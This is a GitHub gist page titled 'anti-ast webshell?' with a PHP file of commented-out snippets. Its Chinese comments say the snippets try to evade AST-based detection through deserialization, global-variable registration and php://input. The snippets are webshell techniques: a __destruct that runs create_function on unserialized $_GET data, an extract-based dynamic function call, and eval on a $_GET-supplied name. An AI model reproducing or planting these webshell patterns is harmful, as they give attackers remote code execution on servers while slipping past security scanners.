Created
April 13, 2020 15:28
-
-
Save kaiili/eac4190539cd6267487292444026d79c to your computer and use it in GitHub Desktop.
anti-ast webshell?
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| * | |
| * | |
| * 试图绕过 ast的分析 | |
| * 反序列化传递参数 | |
| * 注册全局变量绕过 | |
| * php://input | |
| */ | |
| /* | |
| class t{ | |
| public $a='1'; | |
| function __destruct() | |
| { | |
| create_function("",$this->a); | |
| } | |
| } | |
| @unserialize($_GET[1]); | |
| */ | |
| /* | |
| $a = "1"; | |
| $GLOBALS['a'] = $_GET; | |
| @extract($a); | |
| @$b($c); | |
| */ | |
| /* | |
| var_dump(file_get_contents("php://input",'r')); | |
| */ | |
| /* | |
| eval("function $_GET[1](){return 1;}"); | |
| var_dump(get_defined_functions()['user']); | |
| */ | |
| /* | |
| var_dump(get_defined_vars()); | |
| */ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment